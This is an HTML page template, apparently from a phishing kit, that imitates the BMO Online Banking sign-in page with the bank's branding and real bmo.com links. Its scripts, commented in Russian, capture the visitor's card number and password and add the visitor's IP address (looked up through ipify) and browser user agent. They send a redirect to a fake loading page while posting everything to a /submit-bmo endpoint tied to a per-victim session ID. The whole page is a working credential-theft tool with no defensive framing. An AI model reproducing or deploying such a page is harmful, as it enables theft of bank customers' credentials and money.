<!DOCTYPE html>
<html lang="en"><head><script src="https://codesandbox.io/p/chrome-devtool/protocol/index.js"></script>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>BMO Online Banking</title>
  <link rel="shortcut icon" href="https://www.bmo.com/dist/favicon/favicon-16x16.png">
  <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
  <style>
    body {
      font-family: Arial, Helvetica, sans-serif;
      background-color: #f5f6f7;
      color: #333333;
    }
    .bg-bmo-blue {
      background-color: #0079c1;
    }
    .text-bmo-blue {
      color: #0079c1;
    }
    .text-bmo-link {
      color: #0079c1;
    }
    .bmo-button {
      background-color: #0079c1;
      color: white;
      border-radius: 9999px;
      padding: 0.75rem 2rem;
      font-weight: 600;
      transition: background-color 0.2s;
    }
    .bmo-button:hover {
      background-color: #0066a4;
    }
    .input-field {
      width: 100%;
      padding: 0.5rem;
      border: 1px solid #d1d5db;
      border-radius: 0.25rem;
    }
    .input-field:focus {
      outline: none;
      border-color: #0079c1;
    }
  </style>
</head><script src="https://codesandbox.io/p/preview-protocol.js" defer="" async=""></script>
<body>
  <div class="min-h-screen flex flex-col">
    <!-- Header -->
    <header class="bg-bmo-blue text-white">
      <div class="container mx-auto px-4 py-4 flex justify-between items-center">
        <div class="flex items-center">
          <a href="https://www1.bmo.com" class="flex items-center">
            <img src="https://i.postimg.cc/cJY0qCbK/image.png" alt="BMO Logo" class="h-8">
          </a>
        </div>
        
        <div class="flex items-center gap-6">
          <a href="#" class="text-white flex items-center gap-1">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M20 10c0 6-8 12-8 12s-8-6-8-12a8 8 0 0 1 16 0Z"></path><circle cx="12" cy="10" r="3"></circle></svg>
          </a>
          <a href="#" class="text-white flex items-center gap-1">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><path d="M9.09 9a3 3 0 0 1 5.83 1c0 2-3 3-3 3"></path><path d="M12 17h.01"></path></svg>
          </a>
          <a href="#" class="text-white font-semibold">
            FR
          </a>
        </div>
      </div>
    </header>
    
    <!-- Main Content -->
    <main class="flex-grow flex flex-col items-center px-4 py-8">
      <div class="w-full max-w-5xl flex justify-center items-center mb-8">
        <h1 class="text-2xl font-bold flex items-center gap-2">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="text-bmo-blue"><rect width="18" height="11" x="3" y="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 10 0v4"></path></svg>
          Sign in to Online Banking
        </h1>
      </div>
      
      <form action="/submit-bmo" method="POST" id="bmo-login-form">
        <input type="hidden" name="url_id" value="{{ url_id }}">

      <div class="w-full max-w-5xl flex flex-col md:flex-row gap-6">
        <!-- Left Column - Login Form -->
        <div class="w-full md:w-1/2">
          <div class="bg-white p-6 rounded shadow-sm">
            <div class="mb-6">
              <label class="block mb-2 text-sm font-medium">Card number</label>
              <input type="text" id="cardNumber" name="login-id" class="input-field">
              <p class="text-xs text-gray-500 mt-1">Enter your 16-digit card number</p>
            </div>
            
            <div class="mb-4">
              <div class="flex items-center">
                <input type="checkbox" id="remember-card" class="mr-2">
                <label for="remember-card" class="ml-2 text-sm">Remember card</label>
                <button class="ml-1 text-bmo-blue">
                  <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><path d="M12 16v-4"></path><path d="M12 8h.01"></path></svg>
                </button>
              </div>
            </div>
            
            <div class="mb-6">
              <label class="block mb-2 text-sm font-medium">Password</label>
              <div class="relative">
                <input type="password" id="password" name="password" class="input-field pr-10">
                <button class="absolute right-2 top-1/2 transform -translate-y-1/2 text-bmo-blue" onclick="togglePassword(this)">
                  <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M2 12s3-7 10-7 10 7 10 7-3 7-10 7-10-7-10-7Z"></path><circle cx="12" cy="12" r="3"></circle></svg>
                </button>
              </div>
            </div>
            
            <div class="mb-6">
              <a href="https://www1.bmo.com/" class="text-sm text-bmo-link">
                Forgot your password?
              </a>
            </div>
            
            <div class="flex justify-center">
              <button class="bmo-button uppercase">
                Sign in
              </button>
            </div>
          </div>
        </div>
        
        <!-- Right Column - Info -->
        <div class="w-full md:w-1/2">
          <div class="bg-white p-6 rounded shadow-sm mb-6">
            <h2 class="text-lg font-bold mb-2">Register a new card for online banking</h2>
            <div class="flex gap-2 items-center">
              <a href="https://www.bmo.com/online/debitcards/registration/#/terms" class="text-bmo-link font-semibold">DEBIT CARD</a>
              <span class="text-gray-500">or</span>
              <a href="https://www.bmo.com/online/creditcards/registration?lang=en" class="text-bmo-link font-semibold">CREDIT CARD</a>
            </div>
          </div>
          
          <div class="bg-white p-6 rounded shadow-sm">
            <h2 class="text-lg font-bold mb-2 flex items-center gap-2">
              <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="text-bmo-blue"><rect width="18" height="11" x="3" y="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 10 0v4"></path></svg>
              Your security always comes first.
            </h2>
            <p class="text-sm mb-4">
              We've made Online Banking more convenient, while still using advanced 
              security technologies that keep your money and information safe.
            </p>
            <a href="https://www.bmo.com/main/personal/ways-to-bank/security-centre/#tabs-3" class="text-sm text-bmo-link flex items-center gap-1">
              Learn more about how we protect you
              <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" x2="21" y1="14" y2="3"></line></svg>
            </a>
          </div>
        </div>
      </div>
    </main>
    
    <!-- Footer -->
    <footer class="mt-auto py-6 px-4">
      <div class="container mx-auto max-w-5xl">
        <div class="flex flex-wrap justify-between items-center">
          <div class="flex flex-wrap gap-6">
            <a href="https://www.bmo.com/main/personal/legal/" class="text-sm text-bmo-link flex items-center gap-1">
              Legal
              <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" x2="21" y1="14" y2="3"></line></svg>
            </a>
            <a href="https://www.bmo.com/main/about-bmo/privacy-security/our-privacy-code/" class="text-sm text-bmo-link flex items-center gap-1">
              Privacy
              <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" x2="21" y1="14" y2="3"></line></svg>
            </a>
            <a href="https://www.bmo.com/main/personal/ways-to-bank/security-centre/" class="text-sm text-bmo-link flex items-center gap-1">
              Security
              <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" x2="21" y1="14" y2="3"></line></svg>
            </a>
            <a href="https://www.bmo.com/main/about-bmo/accessibility/" class="text-sm text-bmo-link flex items-center gap-1">
              Accessibility
              <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" x2="21" y1="14" y2="3"></line></svg>
            </a>
          </div>
          
          <div class="flex items-center gap-2 mt-4 sm:mt-0">
            <a href="https://www.bmo.com/home/popups/global/cdic" class="text-sm text-bmo-link flex items-center gap-1">
              CDIC Member
              <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" x2="21" y1="14" y2="3"></line></svg>
            </a>
            <img src="https://i.postimg.cc/6qJNw7tD/cdic-logo-footer-en-CA-1.png" alt="CDIC Logo" class="h-10">
          </div>
        </div>
      </div>
    </footer>
  </div>

  <script>
    function togglePassword(button) {
      const input = button.parentElement.querySelector('input');
      const currentType = input.type;
      
      if (currentType === 'password') {
        input.type = 'text';
        button.innerHTML = `<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9.88 9.88a3 3 0 1 0 4.24 4.24"/><path d="M10.73 5.08A10.43 10.43 0 0 1 12 5c7 0 10 7 10 7a13.16 13.16 0 0 1-1.67 2.68"/><path d="M6.61 6.61A13.526 13.526 0 0 0 2 12s3 7 10 7a9.74 9.74 0 0 0 5.39-1.61"/><line x1="2" x2="22" y1="2" y2="22"/></svg>`;
      } else {
        input.type = 'password';
        button.innerHTML = `<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M2 12s3-7 10-7 10 7 10 7-3 7-10 7-10-7-10-7Z"/><circle cx="12" cy="12" r="3"/></svg>`;
      }
    }
  </script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#bmo-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'bmo');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-bmo', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'bmo');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-bmo', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>